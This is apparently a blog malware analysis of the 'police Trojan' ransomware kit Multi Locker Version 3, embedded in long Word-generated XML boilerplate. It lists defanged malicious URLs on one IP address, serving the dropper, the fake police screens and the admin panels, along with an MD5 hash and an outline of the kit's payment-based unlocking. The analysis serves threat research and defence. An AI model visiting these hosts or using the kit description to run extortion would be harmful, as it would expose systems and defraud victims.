UnhideWhenUsed="false" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
</w:LatentStyles>
</xml><![endif]--><!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Tabla normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent:"";
mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
mso-para-margin:0cm;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:"Times New Roman","serif";}
</style>
<![endif]-->
<br />
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif";"><span style="mso-spacerun: yes;"><br /></span></span></div>
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">In last times it has been detected an increase number
of infections caused by the Trojan Ransomware, also called Ransomlock or
Multi-Locker or more famously known as "Trojan police" because it
simulates the user computer has been intervened and blocked by police until
they pay a fee for legal penalty which is nothing more than a fraud or scam by
criminals.</span>
<br />
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">This time will be analyzed the Trojan Kit MULTI LOCKER
Version 3</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span class="hps"><span lang="EN" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN;">The</span></span><span lang="EN" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN;"> <span class="hps">user's computer</span> <span class="hps">is</span>
<span class="hps">compromised</span> <span class="hps">by visiting the</span> <span class="hps">infection vector</span>:</span> </div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: "Arial","sans-serif"; mso-ansi-language: ES;">hxxp://62.76.45.94/exe.php</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">It downloads the malicious binary:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif";">hXXp://62.76.45.94/colt.exe</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif";">Size:
7680 </span></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif";">MD5:baa5de00714b02660bfc092b53c449f7
</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">The IP 62.76.45.94 is hosted at the ISP Clodo-Cloud in
Russia.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">Once the computer is infected, Ransomware Malware
modifies the whole system configuration and registry so that each time the user
restarts the computer, trojan automatically takes over control blocking full
system. Besides virus presents a false screen display of police asking user to
pay the fine for allegedly viewed child pornography or illegal contents against
intellectual property</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">This fake police screen is downloaded from the fraudulent
server at address:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif";">hXXP://62.76.45.94/lending/tds.php</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">This script checks the language version at user's
browser to display the fake police screen in the local country language of the
user with relevant legal notices with warnings from the police of that country.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">The code script of "tds.php" is show as
follows:</span></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-oR8gTtFTWdA/UOrecrjMjZI/AAAAAAAAAWk/Z_6aPn7i7ng/s1600/tds.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="http://1.bp.blogspot.com/-oR8gTtFTWdA/UOrecrjMjZI/AAAAAAAAAWk/Z_6aPn7i7ng/s640/tds.jpg" width="476" /></a></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;"><br /></span></div>
<br />
<br />
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">In the case of Spanish users would display the
following fraudulent screen hosted at:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif";">hXXP://62.76.45.94/lending/ES.php</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-FU8qIHKDxUo/UOre0F0JZcI/AAAAAAAAAWs/INFF3Jn-e4g/s1600/police.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="277" src="http://3.bp.blogspot.com/-FU8qIHKDxUo/UOre0F0JZcI/AAAAAAAAAWs/INFF3Jn-e4g/s400/police.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">In this example, the screen is very poorly designed
unlike other kits detected most detailed enough to trick the user making the
veracity of it.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">Criminals can modify these fake warning pages to
achieve the appearance of legality accessing the mini editor that exists in the
kit Ramsomware, also called by some antivirus companies as Ransomlock.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">The panel is called MULTI LOCKER LENDING<span style="mso-spacerun: yes;"> </span>EDITOR and is accessed via the URL:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif";">Hxxp://62.76.45.94/lending/</span></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif";"> </span><span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;"> </span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-NXrO9kPRgQI/UOre-l4bB4I/AAAAAAAAAW0/sSHDs6gD0g0/s1600/login.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="145" src="http://1.bp.blogspot.com/-NXrO9kPRgQI/UOre-l4bB4I/AAAAAAAAAW0/sSHDs6gD0g0/s400/login.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">And file structure of the LENDING KIT is:</span></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;"> </span>
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-tD3DDKIMkxU/UOrfJiMT13I/AAAAAAAAAW8/xdus2Kaxei0/s1600/mutilocker.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://2.bp.blogspot.com/-tD3DDKIMkxU/UOrfJiMT13I/AAAAAAAAAW8/xdus2Kaxei0/s400/mutilocker.jpg" width="305" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">If user pays the fee through the online payment
systems UKASH, MoneyPack, etc .his Machine will be free once entered the code
returned by these payment systems</span></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-VdYoO8njfGI/UOrfj7iYl3I/AAAAAAAAAXE/Rv07xw_tozU/s1600/unlock.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="70" src="http://3.bp.blogspot.com/-VdYoO8njfGI/UOrfj7iYl3I/AAAAAAAAAXE/Rv07xw_tozU/s400/unlock.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-KqrJ2L6gWCM/UOrfpMmlCXI/AAAAAAAAAXM/I3ZTAnhJX7I/s1600/unlock-2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="41" src="http://2.bp.blogspot.com/-KqrJ2L6gWCM/UOrfpMmlCXI/AAAAAAAAAXM/I3ZTAnhJX7I/s400/unlock-2.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">Ransomware statistical panel is accessed through the
main login page:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-C9u5zIyA5Do/UOrfwC5QyTI/AAAAAAAAAXU/I6FqhwZyrro/s1600/login2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="208" src="http://2.bp.blogspot.com/-C9u5zIyA5Do/UOrfwC5QyTI/AAAAAAAAAXU/I6FqhwZyrro/s400/login2.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">Once logged in can see the main menu screen of KIT
MULTI LOCKER Version 3</span>
<br />
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-AXNh0DA-7g8/UOrf6dg7scI/AAAAAAAAAXc/vrOxnrSQQBI/s1600/2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="262" src="http://4.bp.blogspot.com/-AXNh0DA-7g8/UOrf6dg7scI/AAAAAAAAAXc/vrOxnrSQQBI/s400/2.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<br />
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">Panel with statistical tracking of infected users</span><br />
<br />
<div class="MsoNormal">
</div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif";"></span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-cnKoAQUqwWk/UOrgngINuQI/AAAAAAAAAXk/3BvZ-Wq9bJk/s1600/1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="338" src="http://1.bp.blogspot.com/-cnKoAQUqwWk/UOrgngINuQI/AAAAAAAAAXk/3BvZ-Wq9bJk/s400/1.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">menu of users who have paid for unlocking their
computers</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-8EjJBbu8gEU/UOrhIbW0_9I/AAAAAAAAAXs/AsDlJLKzlyI/s1600/3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="160" src="http://4.bp.blogspot.com/-8EjJBbu8gEU/UOrhIbW0_9I/AAAAAAAAAXs/AsDlJLKzlyI/s400/3.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">The KIT file structure is as follows:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-WB_Stwho5Kc/UOrhPogvVvI/AAAAAAAAAX0/65bZZoma-J4/s1600/kit.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="192" src="http://1.bp.blogspot.com/-WB_Stwho5Kc/UOrhPogvVvI/AAAAAAAAAX0/65bZZoma-J4/s400/kit.jpg" width="400" /></a></div>
<span class="short_text" id="result_box" lang="en"><span class="hps">Panel</span> <span class="hps">Kit Installation</span></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-M4i9HZu0WRE/UOrhX83sDII/AAAAAAAAAX8/Z-nk1Uj9C4U/s1600/4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="381" src="http://2.bp.blogspot.com/-M4i9HZu0WRE/UOrhX83sDII/AAAAAAAAAX8/Z-nk1Uj9C4U/s400/4.jpg" width="400" /></a></div>
</div>
Jose Dos Santoshttp://www.blogger.com/profile/06085925687781351552noreply@blogger.com0tag:blogger.com,1999:blog-5707299821054210891.post-66159647246447616432013-01-07T06:54:00.000-08:002013-01-07T06:54:10.370-08:00 Troyano policía Multi Locker Version 3<div class="separator" style="clear: both; text-align: center;">
</div>
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
o\:* {behavior:url(#default#VML);}
w\:* {behavior:url(#default#VML);}
.shape {behavior:url(#default#VML);}
</style>
<![endif]--><br />
<!--[if gte mso 9]><xml>
<o:OfficeDocumentSettings>
<o:TargetScreenSize>800x600</o:TargetScreenSize>
</o:OfficeDocumentSettings>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:WordDocument>
<w:View>Normal</w:View>
<w:Zoom>0</w:Zoom>
<w:TrackMoves/>
<w:TrackFormatting/>
<w:HyphenationZone>21</w:HyphenationZone>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>ES</w:LidThemeOther>
<w:LidThemeAsian>X-NONE</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:EnableOpenTypeKerning/>
<w:DontFlipMirrorIndents/>
<w:OverrideTableStyleHps/>
</w:Compatibility>
<w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="267">
<w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" Priority="39" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" Name="toc 9"/>
<w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" Priority="0" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" Priority="11" SemiHidden="false"
